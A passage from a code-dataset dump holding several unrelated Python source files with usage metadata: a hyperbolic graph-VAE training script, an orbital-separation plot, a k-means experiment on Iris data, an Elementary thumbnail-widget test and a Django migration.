"sqlalchemy.BOOLEAN", "line_number": 22, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 24, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.BIGINT", "line_number": 26, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 31, "usage_type": "call"}, {"api_name": "base.BaseOrm", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.orm_format.model_to_list", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.orm_format.session_auto_commit", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.orm_format.session_auto_commit", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.orm_format.model_to_list", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.orm_format.session_auto_commit", "line_number": 60, "usage_type": "name"}]}
+{"seq_id": "30851048547", "text": "from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport time\n\nimport numpy as np\nimport scipy.sparse as sp\nimport torch\nfrom torch import optim\nimport warnings\nimport os\nimport json\nfrom model import GCNModelVAE\nfrom optimizer import loss_function\nfrom utils import load_data, mask_test_edges, preprocess_graph, get_roc_score, show_graph_with_labels\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport networkx as nx\nfrom torch import nn\nimport manifolds\nimport json\nfrom synthetic import SyntheticDataset\n\nfrom geoopt.manifolds.poincare.math import dist\n\ndef get_freer_gpu():\n os.system('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')\n memory_available = [int(x.split()[2]) for x in open('tmp', 'r').readlines()]\n return 'cuda:'+str(np.argmax(memory_available))\n\n\ndevice = torch.cuda.is_available()\nparser = argparse.ArgumentParser()\nparser.add_argument('--model', type=str, default='gcn_vae', help=\"models used\")\nparser.add_argument('--seed', type=int, default=123456789, help='Random seed.')\nparser.add_argument('--epochs', type=int, default=400, help='Number of epochs to train.')\nparser.add_argument('--hidden1', type=int, default=32, help='Number of units in hidden layer 1.')\nparser.add_argument('--hidden2', type=int, default=2, help='Number of units in hidden layer 2.')\nparser.add_argument('--gamma', type=float, default=1, help='coefficient for the information term')\nparser.add_argument('--lr', type=float, default=0.0005, help='Initial learning rate.')\nparser.add_argument('--dropout', type=float, default=0., help='Dropout rate (1 - keep probability).')\nparser.add_argument('--dataset-str', type=str, default='synthetic', help='type of dataset.')\nparser.add_argument('--device', type=str, default=get_freer_gpu() if device else 'cpu')\nparser.add_argument('--noise_dim', type=int, default=1)\nparser.add_argument('--K', type=int, default=18)\nparser.add_argument('--J', type=int, default=3)\nparser.add_argument('--c', type=float, default=1., help='constant of curvature')\nparser.add_argument('--warmup_de', type=float, default=30.)\nparser.add_argument('--final_latent', type=str, default=True)\nparser.add_argument('--start_latent_display', type=int, default=0)\nparser.add_argument('--reduced_latent_size', type=int, default=1000)\nparser.add_argument('--latent_display_show', type=int, default=50)\nparser.add_argument('--latent_animation', type=str, default=False)\nparser.add_argument('--syn_dim', type=list, default=[64, 64])\nparser.add_argument('--syn_depth', type=int, default=6)\nparser.add_argument('--new_generation', type=bool, default=True)\nargs = parser.parse_args()\n\nwarnings.filterwarnings('ignore')\n\n\nclass ExpZero(nn.Module):\n def __init__(self, manifold):\n super(ExpZero, self).__init__()\n self.manifold = manifold\n\n def forward(self, input):\n return self.manifold.expmap0(input)\n\n\nclass LogZero(nn.Module):\n def __init__(self, manifold):\n super(LogZero, self).__init__()\n self.manifold = manifold\n\n def forward(self, input):\n return self.manifold.logmap0(input)\n\nclass Discriminator(nn.Module):\n def __init__(self, feature_dim=2, z_dim=2):\n super(Discriminator, self).__init__()\n self.z_dim = z_dim\n self.feature_dim = feature_dim\n self.net = nn.Sequential(\n nn.Linear(self.z_dim + self.feature_dim, 1000),\n nn.ReLU(False),\n nn.Linear(1000, 400),\n nn.ReLU(False),\n 
nn.Linear(400, 100),\n nn.ReLU(False),\n nn.Linear(100, 1),\n\n )\n\n def forward(self, x, z):\n x = x.view(-1, 64*64)\n x = torch.cat((x, z), 1)\n return self.net(x).squeeze()\n\n\ndef permute_dims(z):\n assert z.dim() == 2\n B, _ = z.size()\n perm = torch.randperm(B).to(args.device)\n perm_z = z[perm]\n return perm_z\n\ndef gae_for(args):\n torch.manual_seed(args.seed + 1)\n print(\"Using {} dataset\".format(args.dataset_str))\n if args.dataset_str in ['cora', 'citeseer', 'pubmed']:\n adj, features, labels = load_data(args.dataset_str)\n print(adj.shape, features.shape)\n exit()\n\n elif args.dataset_str == 'synthetic':\n if args.new_generation:\n dict_adj, adj_array, features = SyntheticDataset(args.syn_dim, args.syn_depth).__getitem__()\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(dict_adj))\n features = (255 - features) / 255.\n features = torch.Tensor(features)\n else:\n with open('adj_dict.json', 'r') as fp:\n dict_adj = json.load(fp)\n\n adj_dict = {}\n for a in dict_adj:\n adj_dict[int(a)] = dict_adj[a]\n\n adj_array, features = np.load('adjacancy.npy'), np.load('features.npy')\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(adj_dict))\n features = torch.Tensor(features)\n else:\n raise ValueError('not exist!!!')\n\n features = features.to(args.device).unsqueeze(1)\n n_nodes, _, feat_dim_hight, feat_dim_length = features.shape\n\n # Store original adjacency matrix (without diagonal entries) for later\n adj_orig = adj\n adj_orig = adj_orig - sp.dia_matrix((adj_orig.diagonal()[np.newaxis, :], [0]), shape=adj_orig.shape)\n adj_orig.eliminate_zeros()\n\n adj_train, train_edges, val_edges, val_edges_false, test_edges, test_edges_false = mask_test_edges(adj=adj,\n args=args)\n adj = adj_train\n\n # Some preprocessing\n adj_norm = preprocess_graph(adj)\n adj_norm = adj_norm.to(args.device)\n\n adj_label = adj_train + sp.eye(adj_train.shape[0])\n # adj_label = sparse_to_tuple(adj_label)\n adj_label = torch.FloatTensor(adj_label.toarray())\n adj_orig_tile = adj_label.unsqueeze(2).repeat(1, 1, args.K)\n adj_orig_tile = adj_orig_tile.to(args.device)\n\n pos_weight = torch.tensor(float(adj.shape[0] * adj.shape[0] - adj.sum()) / adj.sum()).float().to(\n device=args.device)\n norm = adj.shape[0] * adj.shape[0] / float((adj.shape[0] * adj.shape[0] - adj.sum()) * 2)\n\n psi_input_dim = args.noise_dim + feat_dim_hight + feat_dim_length\n logv_input_dim = feat_dim_hight + feat_dim_length\n\n model = GCNModelVAE(psi_input_dim, logv_input_dim, args.hidden1, args.hidden2, args.dropout, args.K, args.J, args.noise_dim, args.device, args.c).to(args.device)\n optimizer = optim.Adam(model.parameters(), lr=args.lr)\n\n D = Discriminator(feature_dim=64*64, z_dim=args.hidden2).to(args.device)\n optimizer_D = optim.Adam(D.parameters(), lr=0.0005)\n manifold = getattr(manifolds, 'PoincareBall')(args.hidden2, args.c)\n\n latent_img = []\n fig = plt.figure()\n ax = fig.add_subplot(111)\n mapper = LogZero(manifold)\n\n for epoch in range(args.epochs):\n warm_up = torch.min(torch.FloatTensor([epoch/args.warmup_de, 1])).to(args.device)\n\n t = time.time()\n model.train()\n\n reconstruct_iw, log_prior_iw, log_H_iw, psi_iw_vec, psi_iw = model(features, adj_norm)\n hidden_emb = psi_iw[:, 1, :].data.contiguous().cpu().numpy()\n z_vec = mapper(psi_iw)\n\n loss1 = loss_function(reconstructed_iw=reconstruct_iw, log_prior_iw=log_prior_iw, log_H_iw=log_H_iw,\n adj_orig_tile=adj_orig_tile, nodes=n_nodes, K=args.K, pos_weight=pos_weight, norm=norm,\n warm_up=warm_up, device=args.device)\n for i in 
range(int(args.K/2)):\n z = z_vec[:, i]\n D_xz = D(features, z)\n z_perm = permute_dims(z)\n D_x_z = D(features, z_perm)\n output_ = -(D_xz.mean() - (torch.exp(D_x_z - 1).mean()))\n if i == 0:\n output = output_.unsqueeze(0)\n else:\n output = torch.cat((output, output_.unsqueeze(0)), dim=0)\n\n Info_xz = output.mean()\n\n loss = loss1 + args.gamma * Info_xz\n\n optimizer.zero_grad()\n loss.backward(retain_graph=True)\n optimizer_D.zero_grad()\n Info_xz.backward()\n\n optimizer.step()\n optimizer_D.step()\n\n cur_loss = loss.item()\n print('Epoch:', '%04d ---> ' % (epoch + 1), 'training_loss = {:.5f} '.format(cur_loss),\n 'time = {:.5f} '.format(time.time() - t))\n\n writer.add_scalar('Loss/train_loss', cur_loss, epoch)\n\n #print(\"Optimization Finished!\")\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n for i in range(adj_array.shape[0]):\n for j in range(adj_array.shape[0]):\n if adj_array[i, j] == 1:\n x_vals = [hidden_emb[i, 0], hidden_emb[j, 0]]\n y_vals = [hidden_emb[i, 1], hidden_emb[j, 1]]\n ax.plot(x_vals, y_vals, color='blue', linewidth=0.8)\n\n for i in range(adj_array.shape[0]):\n\n ax.scatter(hidden_emb[i, 0],\n hidden_emb[i, 1],\n cmap='jet', c='black', edgecolors=None, s=20)\n\n\n ax.set_xlim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n ax.set_ylim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n patch = plt.Circle((0, 0), radius=1 / np.sqrt(args.c), color='black', fill=False)\n ax.add_patch(patch)\n if epoch > 60:\n plt.show()\n fig.savefig('moreeps/reduced_latent_more_{}.pdf'.format(epoch), format='pdf', dpi=500)\n #hidden_emb = torch.from_numpy(hidden_emb)\n #A = torch.zeros(hidden_emb.shape[0], hidden_emb.shape[0])\n #for i in range(hidden_emb.shape[0]):\n # for j in range(hidden_emb.shape[0]):\n # A[i, j] = dist(hidden_emb[i], hidden_emb[j], c=args.c)\n\n #print(A)\n #exit()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n\n for i in range(adj_array.shape[0]):\n for j in range(adj_array.shape[0]):\n if adj_array[i, j] == 1:\n x_vals = [hidden_emb[i, 0], hidden_emb[j, 0]]\n y_vals = [hidden_emb[i, 1], hidden_emb[j, 1]]\n ax.plot(x_vals, y_vals, color='blue', linewidth=0.8)\n\n for i in range(adj_array.shape[0]):\n\n ax.scatter(hidden_emb[i, 0],\n hidden_emb[i, 1],\n cmap='jet', c='black', edgecolors=None, s=20)\n\n\n for i in range(adj_array.shape[0]):\n ax.annotate(str(i), (hidden_emb[i, 0], hidden_emb[i, 1]))\n\n ax.set_xlim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n ax.set_ylim(\n [-1 / np.sqrt(args.c) - 0.2 * (1 / np.sqrt(args.c)), 1 / np.sqrt(args.c) + 0.2 * (1 / np.sqrt(args.c))])\n patch = plt.Circle((0, 0), radius=1 / np.sqrt(args.c), color='black', fill=False)\n ax.add_patch(patch)\n fig.savefig('moreeps/reduced_latent_{}.pdf'.format(epoch), format='pdf', dpi=500)\n\n\nif __name__ == '__main__':\n print('New_Experiment', 'c:{}'.format(args.c), 'K:{}'.format(args.K), 'J:{}'.format(args.J),\n 'learning_rate:{}'.format(args.lr),\n 'warm_up:{}'.format(args.warmup_de), 'hidden1:{}'.format(args.hidden1), 'hidden2:{}'.format(args.hidden2),\n 'dropout:{}'.format(args.dropout))\n tensorboard_file_name = '___Run_ID___' + '__c' + str(args.c) + '__K' + str(args.K) + '__J' + str(args.J) + \\\n '__lr' + str(args.lr) + '__warm_up' + str(args.warmup_de) + '__hidden1_' + str(\n args.hidden1) + \\\n '__hidden2_' + str(args.hidden2) + '__dropout' + str(args.dropout)\n writer = 
SummaryWriter(log_dir='./logs', filename_suffix=tensorboard_file_name)\n gae_for(args)\n", "repo_name": "esihge/esihge", "sub_path": "main_synthetic.py", "file_name": "main_synthetic.py", "file_ext": "py", "file_size_in_byte": 11922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.system", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 34, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 87, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 89, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 91, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.randperm", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.load_data", "line_number": 114, "usage_type": "call"}, {"api_name": "synthetic.SyntheticDataset", "line_number": 120, "usage_type": "call"}, {"api_name": "networkx.adjacency_matrix", "line_number": 121, "usage_type": "call"}, {"api_name": "networkx.from_dict_of_lists", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 123, "usage_type": "call"}, {"api_name": "json.load", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 132, "usage_type": "call"}, {"api_name": "networkx.adjacency_matrix", "line_number": 133, "usage_type": "call"}, {"api_name": "networkx.from_dict_of_lists", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.sparse.dia_matrix", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 143, "usage_type": "name"}, {"api_name": 
"numpy.newaxis", "line_number": 143, "usage_type": "attribute"}, {"api_name": "utils.mask_test_edges", "line_number": 146, "usage_type": "call"}, {"api_name": "utils.preprocess_graph", "line_number": 151, "usage_type": "call"}, {"api_name": "scipy.sparse.eye", "line_number": 154, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 160, "usage_type": "call"}, {"api_name": "model.GCNModelVAE", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 168, "usage_type": "name"}, {"api_name": "model.parameters", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.min", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 180, "usage_type": "call"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}, {"api_name": "model.train", "line_number": 183, "usage_type": "call"}, {"api_name": "optimizer.loss_function", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 197, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 201, "usage_type": "call"}, {"api_name": "optimizer.zero_grad", "line_number": 207, "usage_type": "call"}, {"api_name": "optimizer.step", "line_number": 212, "usage_type": "call"}, {"api_name": "time.time", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Circle", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 246, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Circle", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 294, "usage_type": "call"}]}
+{"seq_id": "340148573", "text": "\"\"\"\nPlots the energy and seperation evolutions of the [sun, earth, jupiter] system.\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport initial_conditions as ic\n\nyear_in_s = ic.year_in_s\ndt = np.array([50, 25, 10, 1]) * ic.dt\nparticle_sets = [ic.create_particles(dt=i) for i in dt]\n\ndef modulus(vector):\n\t\ttotal = np.sqrt(sum(vector[i]**2 for i in range(3))) \n\t\treturn total\n\nmpl.rcParams[\"font.size\"] = 25\nfig, ax = plt.subplots(figsize=(10,10))\nax.set(xlabel='Time [yrs]', ylabel='Percentage change in Seperation')\nplt.gcf().set_tight_layout(True) # To prevent the xlabel being cut off\n\n\n\nfor index, particles in enumerate(particle_sets):\n time = 0\n sun = particles[0]\n earth = particles[1]\n seperation = [modulus(earth.pos - sun.pos)]\n time_tracker = [0]\n\n for i in range(int(year_in_s / dt[index]) * 10):\n time += dt[index] / year_in_s\n time_tracker.append(time)\n for p in particles:\n p.calc_next_v(particles)\n for p in particles:\n p.set_new_v()\n p.calc_next_pos()\n p.set_new_pos()\n seperation.append(modulus(earth.pos - sun.pos))\n \n ax.plot(time_tracker, ((seperation - seperation[0]) / seperation[0]) * 100, label = f\"{int(dt[index] / ic.dt)} day timestep\", linewidth=4)\n\nax.legend()\nplt.show()\n", "repo_name": "zebsummerfield/Gravitational_Collapse", "sub_path": "seperation_with_different_dt.py", "file_name": "seperation_with_different_dt.py", "file_ext": "py", "file_size_in_byte": 1344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "initial_conditions.year_in_s", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "initial_conditions.dt", "line_number": 11, "usage_type": "attribute"}, {"api_name": "initial_conditions.create_particles", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.rcParams", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "initial_conditions.dt", "line_number": 43, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "69920130973", "text": "import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.utils import shuffle\r\nimport math\r\nimport seaborn as sns\r\nfrom scipy.spatial import distance\r\nimport matplotlib.pyplot as plt\r\ndef iterd(a):\r\n a=round(math.sqrt(a))\r\n if (a%2)==0:\r\n a=a+1\r\n return(a)\r\n else:\r\n return(a)\r\ndf=pd.read_excel(\"Iris.xls\")\r\ndf=shuffle(df)\r\nklist=[]\r\ndistlist=[]\r\n# =============================================================================\r\n# G1=pd.DataFrame()\r\n# G2=pd.DataFrame()\r\n# G3=pd.DataFrame()\r\n# =============================================================================\r\ndf=df.drop(\"iris\",axis=1)\r\nfor k in range(2,iterd(len(df))):\r\n df[\"grp\"]=0\r\n grp=df.sample(n=k,random_state=56)\r\n grp[\"value\"]=0\r\n i=0\r\n for index,row in grp.iterrows():\r\n row[\"grp\"]=i\r\n grp.loc[index]=row\r\n i=i+1\r\n \r\n for index1,row1 in df.iterrows():\r\n for index,row in grp.iterrows():\r\n row[\"value\"]=distance.euclidean(list(row.drop([\"grp\",\"value\"])),list(row1.drop([\"grp\"])))\r\n grp.loc[index]=row\r\n grp=grp.sort_values(by=\"value\")\r\n row1[\"grp\"]=grp.head(1)[\"grp\"]\r\n df.loc[index1]=row1\r\n for jk in range(20):\r\n \r\n g=df.groupby(\"grp\")\r\n for s,r in g:\r\n grp[\"sepal length\"][grp[\"grp\"]==s]=df[\"sepal length\"][df[\"grp\"]==s].mean()\r\n grp[\"sepal width\"][grp[\"grp\"]==s]=df[\"sepal width\"][df[\"grp\"]==s].mean()\r\n grp[\"petal length\"][grp[\"grp\"]==s]=df[\"petal length\"][df[\"grp\"]==s].mean()\r\n grp[\"petal width\"][grp[\"grp\"]==s]=df[\"petal width\"][df[\"grp\"]==s].mean()\r\n dist=0\r\n for index1,row1 in df.iterrows():\r\n for index,row in grp.iterrows():\r\n row[\"value\"]=distance.euclidean(list(row.drop([\"grp\",\"value\"])),list(row1.drop([\"grp\"])))\r\n grp.loc[index]=row\r\n grp=grp.sort_values(by=\"value\")\r\n row1[\"grp\"]=grp.head(1)[\"grp\"]\r\n dist=dist+float(grp.head(1)[\"value\"]**2)\r\n df.loc[index1]=row1\r\n klist.append(k)\r\n distlist.append(dist)\r\nprint(klist)\r\nprint(distlist)\r\nplt.plot(klist,distlist)\r\nplt.show()\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n ", "repo_name": "arunava5764/Efficient_Clustering_using_Closest_Neighbor_approach", "sub_path": "kmeans_modified_compare.py", "file_name": "kmeans_modified_compare.py", "file_ext": "py", "file_size_in_byte": 2194, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "math.sqrt", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.utils.shuffle", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 37, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "12576840209", "text": "#!/usr/bin/env python\n# encoding: utf-8\nimport elementary\nimport evas\n\ndef thumb_clicked(obj):\n if not elementary.need_ethumb():\n print(\"Ethumb not available!\")\n return\n\n images = (\n \"panel_01.jpg\",\n \"plant_01.jpg\",\n \"rock_01.jpg\",\n \"rock_02.jpg\",\n \"sky_01.jpg\",\n \"sky_02.jpg\",\n \"sky_03.jpg\",\n \"sky_04.jpg\",\n \"wood_01.jpg\",\n \"mystrale.jpg\",\n \"mystrale_2.jpg\"\n )\n\n win = elementary.StandardWindow(\"thumb\", \"Thumb\")\n win.autodel_set(True)\n if obj is None:\n win.callback_delete_request_add(lambda o: elementary.exit())\n\n tb = elementary.Table(win)\n tb.size_hint_weight_set(evas.EVAS_HINT_EXPAND, evas.EVAS_HINT_EXPAND)\n\n n = 0\n for j in range(12):\n for i in range(12):\n th = elementary.Thumb(win)\n n = (n + 1) % 11\n th.file = \"images/%s\" % (images[n])\n th.size_hint_weight_set(evas.EVAS_HINT_EXPAND, evas.EVAS_HINT_EXPAND)\n th.size_hint_align_set(evas.EVAS_HINT_FILL, evas.EVAS_HINT_FILL)\n tb.pack(th, i, j, 1, 1)\n th.editable = True\n th.show()\n\n sc = elementary.Scroller(win)\n sc.size_hint_weight_set(evas.EVAS_HINT_EXPAND, evas.EVAS_HINT_EXPAND)\n win.resize_object_add(sc)\n\n sc.content_set(tb)\n tb.show()\n sc.show()\n\n win.resize(600, 600)\n win.show()\n\nif __name__ == \"__main__\":\n elementary.init()\n\n thumb_clicked(None)\n\n elementary.run()\n elementary.shutdown()\n", "repo_name": "kakaroto/e17", "sub_path": "BINDINGS/python/python-elementary/tests/test_thumb.py", "file_name": "test_thumb.py", "file_ext": "py", "file_size_in_byte": 1520, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "31", "api": [{"api_name": "elementary.need_ethumb", "line_number": 7, "usage_type": "call"}, {"api_name": "elementary.StandardWindow", "line_number": 25, "usage_type": "call"}, {"api_name": "elementary.exit", "line_number": 28, "usage_type": "call"}, {"api_name": "elementary.Table", "line_number": 30, "usage_type": "call"}, {"api_name": "evas.EVAS_HINT_EXPAND", "line_number": 31, "usage_type": "attribute"}, {"api_name": "elementary.Thumb", "line_number": 36, "usage_type": "call"}, {"api_name": "evas.EVAS_HINT_EXPAND", "line_number": 39, "usage_type": "attribute"}, {"api_name": "evas.EVAS_HINT_FILL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "elementary.Scroller", "line_number": 45, "usage_type": "call"}, {"api_name": "evas.EVAS_HINT_EXPAND", "line_number": 46, "usage_type": "attribute"}, {"api_name": "elementary.init", "line_number": 57, "usage_type": "call"}, {"api_name": "elementary.run", "line_number": 61, "usage_type": "call"}, {"api_name": "elementary.shutdown", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "25722859449", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bober_tasks', '0003_task_country'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='tasktranslation',\n name='template',\n field=models.CharField(default='default', max_length=255, choices=[(b'default', b'default.html')]),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='task',\n name='interaction_type',\n field=models.CharField(default=b'non-interactive', max_length=45),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='task',\n name='international_id',\n field=models.CharField(unique=True, max_length=16),\n preserve_default=True,\n ),\n ]\n", "repo_name": "polz113/bober", "sub_path": "django/bober/bober_tasks/migrations/0004_auto_20151109_1733.py", "file_name": "0004_auto_20151109_1733.py", "file_ext": "py", "file_size_in_byte": 939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": 